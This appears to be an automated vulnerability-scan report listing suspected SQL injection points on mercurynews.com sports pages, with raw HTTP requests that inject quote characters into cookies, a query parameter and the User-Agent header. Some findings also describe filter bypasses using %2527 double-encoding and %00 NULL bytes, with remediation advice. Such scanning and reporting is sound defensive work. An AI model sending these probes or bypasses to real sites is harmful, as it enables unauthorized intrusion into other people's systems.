The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sharks/ci_16794268?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16794268?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16794268?source=rss%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16794268?source=rss%2527%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16794268?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16794268?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Demers, Wallin injuries could have been worseDETROIT -- Jason Demers and Niclas Wallin had ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sharks/ci_16795056?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A Sharks team that looked to be in way over its head for the first 10 minutes skated away w ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>But then everything changed. The Sharks started getting their sticks in the way of those crisp passes. That nightly attempt by Pavel Datsyuk to split the defense failed. Shooting lanes closed.</p> ...[SNIP]...
Request 2
GET /sharks/ci_16795056?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16795056?s ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16739351?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT=' Something about this matchup turns the 49ers into alpha dogs and the Arizona Cardinals int ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>The Gore loss just gives them more to overcome. Now there is nothing for the 49ers to do but fight their way out, or at least fail valiantly. </p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16739351?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1673 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16755984?source=rss' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss'' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%00'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%00''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
